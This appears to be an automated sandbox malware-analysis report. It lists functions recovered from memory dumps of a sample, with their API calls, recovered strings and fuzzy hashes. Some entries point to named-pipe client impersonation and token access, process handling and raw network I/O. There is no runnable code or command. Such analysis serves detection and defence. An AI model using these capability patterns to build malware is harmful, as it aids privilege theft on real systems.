ioctlsocket.WS2_32 ref: 00675A05

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountTickioctlsocket
String ID:
API String ID: 3686034022-0
Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
Instruction ID: bbe50e0202cb6f6ad8ee280aec3c1a58fbc916d8ae08fde82de85a24ae74b9b2
Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
Instruction Fuzzy Hash: 94112932704EC197E7108B69E8543597322E784BB4F504220DB4E86EA0DFBDCC99CB50

Function 00670AA0 Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00670AC6
ConnectNamedPipe.KERNEL32 ref: 00670ADC
ReadFile.KERNEL32 ref: 00670B06
ImpersonateNamedPipeClient.ADVAPI32 ref: 00670B17
GetCurrentThread.KERNEL32 ref: 00670B21
OpenThreadToken.ADVAPI32 ref: 00670B39
DisconnectNamedPipe.KERNEL32 ref: 00670B4F

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
String ID:
API String ID: 4232080776-0
Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
Instruction ID: b18c62b105e39fa9bd382888b4b7a9ba732a94301dd04494ffbb538dad6fbaa7
Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
Instruction Fuzzy Hash: 7311E331710642C6F750AB25EC647AA3327FBC4B44F848116890E82E60DF3EC568CB62

Function 001BFF10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001BFF4C

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

_invalid_parameter_noinfo.LIBCMT ref: 001BFF57
memcpy_s.LIBCMT ref: 001C001C
_fileno.LIBCMT ref: 001C0087
_filbuf.LIBCMT ref: 001C00B5
_errno.LIBCMT ref: 001C0105

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
Instruction ID: c862a0ed6b8f5ce2fa69b836523f6c9ead2efe547d3ca5b4723f08b5149bf0ef
Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
Instruction Fuzzy Hash: 07512C32704350C69B198A665900BBAB691B769BF4F19872DFF7943FD5CB38C4A28740

Function 00680B10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00680B4C

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

_invalid_parameter_noinfo.LIBCMT ref: 00680B57
memcpy_s.LIBCMT ref: 00680C1C
_fileno.LIBCMT ref: 00680C87
_filbuf.LIBCMT ref: 00680CB5
_errno.LIBCMT ref: 00680D05

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
Instruction ID: 482e37c5ac51eca48aac66d78720c05e2b5d2f6479f3cc17f4d53c8a761545bf
Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
Instruction Fuzzy Hash: AF51603170475086FB98BE6695005AAB693F755FF8F148F24AE3947FD4CB38D49A8340

Function 001B1030 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 150COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 001B1063

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

Part of subcall function 001AC444: malloc.LIBCMT ref: 001AC457

free.LIBCMT ref: 001B115E
free.LIBCMT ref: 001B116B

Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664

Strings

n from %d (%u), xrefs: 001B1229
open process: %d (%u), xrefs: 001B10BF
1:%u/'); %s, xrefs: 001B10F9

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$freemalloc$_callnewh
String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
API String ID: 2029259483-317027030
Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
Instruction ID: c88a008fba11b0880876a59c021beeebc6c3bd86dbfa66db4d61d791c2e2c4ff
Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
Instruction Fuzzy Hash: 4651C072708790A6DB10DF66E4503EEB7A2F399B94F404016EE8A47B58EF7CC609CB40

Function 0068A348 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 0068A375

Part of subcall function 00683E58: _FF_MSGBANNER.LIBCMT ref: 00683E75
Part of subcall function 00683E58: _NMSG_WRITE.LIBCMT ref: 00683E7F

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0068A3F8
EnterCriticalSection.KERNEL32 ref: 0068A414
LeaveCriticalSection.KERNEL32 ref: 0068A424
_calloc_crt.LIBCMT ref: 0068A49A
__lock_fhandle.LIBCMT ref: 0068A502

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
String ID:
API String ID: 445582508-0
Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
Instruction ID: 4914a5b9f05a24cbee6919df2c3318ca5fba6cc4527ed45511ea0f3f6cba0893
Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
Instruction Fuzzy Hash: 0E51F33260078082EF20EF54D45436DB7ABFB94B58F19471ADE4E477A0DBB8C956C702

Function 00671694 Relevance: 9.1, APIs: 6, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008

Part of subcall function 00680620: _errno.LIBCMT ref: 00680577
Part of subcall function 00680620: _invalid_parameter_noinfo.LIBCMT ref: 00680582

fseek.LIBCMT ref: 00671730

Part of subcall function 00680EA4: _errno.LIBCMT ref: 00680ECC
Part of subcall function 00680EA4: _invalid_parameter_noinfo.LIBCMT ref: 00680ED7

_ftelli64.LIBCMT ref: 00671738

Part of subcall function 00680F18: _errno.LIBCMT ref: 00680F36
Part of subcall function 00680F18: _invalid_parameter_noinfo.LIBCMT ref: 00680F41

fseek.LIBCMT ref: 00671748

Part of subcall function 00680EA4: _fseek_nolock.LIBCMT ref: 00680EF5

GetFullPathNameA.KERNEL32 ref: 0067176B
malloc.LIBCMT ref: 00671788

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057

Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F

fclose.LIBCMT ref: 00671845

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
String ID:
API String ID: 3587854850-0
Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
Instruction ID: 7ab80978dd0f55085e882ccbcc8fdfab77c345480eb8815360099638d3a819f6
Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
Instruction Fuzzy Hash: CB41F52271468082DB84EB26E41576E6353F7C9BD0F90C22AEE5E4BB96DF3DC506CB05

Function 00675C60 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 00675C78
GetOEMCP.KERNEL32 ref: 00675C82
GetCurrentProcessId.KERNEL32 ref: 00675CA8
GetTickCount.KERNEL32 ref: 00675CB0

Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454

GetCurrentProcess.KERNEL32 ref: 00675CEC

Part of subcall function 00670C64: GetModuleHandleA.KERNEL32 ref: 00670C79
Part of subcall function 00670C64: GetProcAddress.KERNEL32 ref: 00670C89

GetCurrentProcessId.KERNEL32 ref: 00675D5E

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
String ID:
API String ID: 3426420785-0
Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
Instruction ID: a31f047bb2689254cef874948690ad23f5f662dbf2868a21ec4335529d286551
Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
Instruction Fuzzy Hash: EB410662710611A5FF40EBB1DC6579D33ABBF89784F40441AEE0D87A69EF3AC10AC758

Function 00676F2C Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00676F5E

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

htonl.WS2_32 ref: 00676F91
recvfrom.WS2_32 ref: 00676FD5
WSAGetLastError.WS2_32 ref: 00676FE2

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
String ID:
API String ID: 2310505145-0
Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
Instruction ID: dacedd6afec655f8603582c3147e2722dd160d8df43d601f604d9943b79852a0
Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
Instruction Fuzzy Hash: 5A41C272304B80C2EB10DF25E85476A77A3F799BA8F148225EA8D47B68DF39C491CF41

Function 006779C4 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 006779FF
UpdateProcThreadAttribute.KERNEL32 ref: 00677A3F
GetLastError.KERNEL32 ref: 00677A49
GetCurrentProcess.KERNEL32 ref: 00677A7E
GetCurrentProcess.KERNEL32 ref: 00677ABE
GetCurrentProcess.KERNEL32 ref: 00677AEF

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
String ID:
API String ID: 1014270282-0
Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
Instruction ID: 76af5c70d6d55f15a5d3e694d8c45974960cfc59736c55926a841bf454df5036
Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
Instruction Fuzzy Hash: 9B319E3221878486EB20CF52D40439977A6F789FD8F088229EE4D47B58DF7DC605CB04

Function 001BFA20 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 001BF977

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

_invalid_parameter_noinfo.LIBCMT ref: 001BF982
_getstream.LIBCMT ref: 001BF9A2
_errno.LIBCMT ref: 001BF9B4
_errno.LIBCMT ref: 001BF9C6
_openfile.LIBCMT ref: 001BF9F4

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
Instruction ID: d79c40bf3918c9fa484927681f85c025c9643a4f9237e60832a0d1a35a135649
Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
Instruction Fuzzy Hash: 90112B3130478691DB155F72AC0179EA691BBA9BC4F48443DFE8997B15EF3CC4528700

Function 00680620 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00680577

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

_invalid_parameter_noinfo.LIBCMT ref: 00680582
_getstream.LIBCMT ref: 006805A2
_errno.LIBCMT ref: 006805B4
_errno.LIBCMT ref: 006805C6
_openfile.LIBCMT ref: 006805F4

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
Instruction ID: a40d540d47b088048bfe16391e653f490ec8f920807c678a62003acf545fab94
Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
Instruction Fuzzy Hash: BA112B6131478286FBD1BF22A90131EA7A7BF45BC0F448B25AE8997B15EF3CC4518B15

Function 001C9B3C Relevance: 9.1, APIs: 6, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001C9B55

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

__lock_fhandle.LIBCMT ref: 001C9B9D
__doserrno.LIBCMT ref: 001C9BD2
_errno.LIBCMT ref: 001C9BD9

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
String ID:
API String ID: 2102446242-0
Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
Instruction ID: dd29af7a0bbcfb0f8c885d72607cb4f9eedecfcd2488692b8e97fb2a43453b91
Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
Instruction Fuzzy Hash: 9C11E632300681A5DB056FA9E8D9FBD7654ABB1760F59412DEA160B392CB78CC41C314

Function 0066FC64 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0066FC85

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

free.LIBCMT ref: 0066FCC0
fwrite.LIBCMT ref: 0066FD01
fclose.LIBCMT ref: 0066FD09
free.LIBCMT ref: 0066FD16

Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C

GetLastError.KERNEL32 ref: 0066FD1B

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
String ID:
API String ID: 1616846154-0
Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
Instruction ID: 7beae5d72eb1f2fed228a9ffe6e69fda94c884abe9a2695e6ca6c291c5bb6aa4
Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
Instruction Fuzzy Hash: A011C851304B4041DA50F762F05126E5353AB85FE4F448639FF6D47B8AEE3DC6058784

Function 00674488 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 006744A6
WaitNamedPipeA.KERNEL32 ref: 006744BB
CreateFileA.KERNEL32 ref: 006744E5
SetNamedPipeHandleState.KERNEL32 ref: 00674507
DisconnectNamedPipe.KERNEL32 ref: 00674514
SetLastError.KERNEL32 ref: 00674529

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
String ID:
API String ID: 3798860377-0
Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
Instruction ID: a5eaa13596bb6ba13a5b20f1861f8e719e20c87dd55486891cc02f8470e61110
Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
Instruction Fuzzy Hash: F411C13270465183FB109B25F52872A63A6F784BA8F408215DB5E47F98CF7DC4668B41

Function 001BE3EC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 001BE40F

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

malloc.LIBCMT ref: 001BE41D

Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D

malloc.LIBCMT ref: 001BE43F
_snprintf.LIBCMT ref: 001BE45A

Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E

malloc.LIBCMT ref: 001BE475

Strings

dpoolWait, xrefs: 001BE444

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID: dpoolWait
API String ID: 2026495703-1875951006
Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
Instruction ID: 6bb0191720dd6e5e514b52e385db50caed7c4f5a737b4c4f143b590beaf4cb2e
Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
Instruction Fuzzy Hash: 0301DEB1700B9081DA04DB52B844799B7D9F7B8FE0F05822AEFA947BC5CF78C0418780

Function 0067EFEC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0067F00F

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

malloc.LIBCMT ref: 0067F01D

Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D

malloc.LIBCMT ref: 0067F03F
_snprintf.LIBCMT ref: 0067F05A

Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E

malloc.LIBCMT ref: 0067F075

Strings

HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0067F044

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
API String ID: 3518644649-2739389480
Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
Instruction ID: e4aaa5cf7ec710a51765eb7b204984538c75f910b742846cdf55e64eaa3db872
Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
Instruction Fuzzy Hash: 8B01D231705B9046DA84DB92B804B19769AF78CFE0F04822DEFAD47BC6DF38C1418780

Function 001B25F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strchr.LIBCMT ref: 001B262E
strchr.LIBCMT ref: 001B264C
malloc.LIBCMT ref: 001B2664
malloc.LIBCMT ref: 001B2671
rand.LIBCMT ref: 001B273D
free.LIBCMT ref: 001B285B
free.LIBCMT ref: 001B2863

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: freemallocstrchr$rand
String ID:
API String ID: 1305919620-0
Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
Instruction ID: 4621b4367b0e2598b79348c7eaca8d736ce7e3cd8140e4c037f313f146006020
Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
Instruction Fuzzy Hash: 2961F862608FC481EA269F29A4113EAB7A0EFA5BD4F085215DF8917B65EF3DC14BC700

Function 006731F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strchr.LIBCMT ref: 0067322E
strchr.LIBCMT ref: 0067324C
malloc.LIBCMT ref: 00673264
malloc.LIBCMT ref: 00673271
rand.LIBCMT ref: 0067333D
free.LIBCMT ref: 0067345B
free.LIBCMT ref: 00673463

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: freemallocstrchr$rand
String ID:
API String ID: 1305919620-0
Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
Instruction ID: b37816b41801c4281175eb57c47ed9b6b93ee4c20e9b0afe91c745b2bdfa0cfe
Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
Instruction Fuzzy Hash: 5B613A62208FD481EA269F39A4013EAA392EF95BD4F088129DF8D17715EF3DC243D304

Function 001A3570 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 001A35BD

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

malloc.LIBCMT ref: 001A35C8

Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D

free.LIBCMT ref: 001A36AF
free.LIBCMT ref: 001A36B7
free.LIBCMT ref: 001A36BF
free.LIBCMT ref: 001A36CB
free.LIBCMT ref: 001A36D8

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
Instruction ID: abc562699c1c0602eaef7a062d5cb2216df987cc85915ee2cd16499f8642370d
Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
Instruction Fuzzy Hash: E941F326300791ABDB15DF27A9603AE6761FB6ABC0F444024EF6A47701EF38DA67C700

Function 00664170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006641BD

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

malloc.LIBCMT ref: 006641C8

Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D

free.LIBCMT ref: 006642AF
free.LIBCMT ref: 006642B7
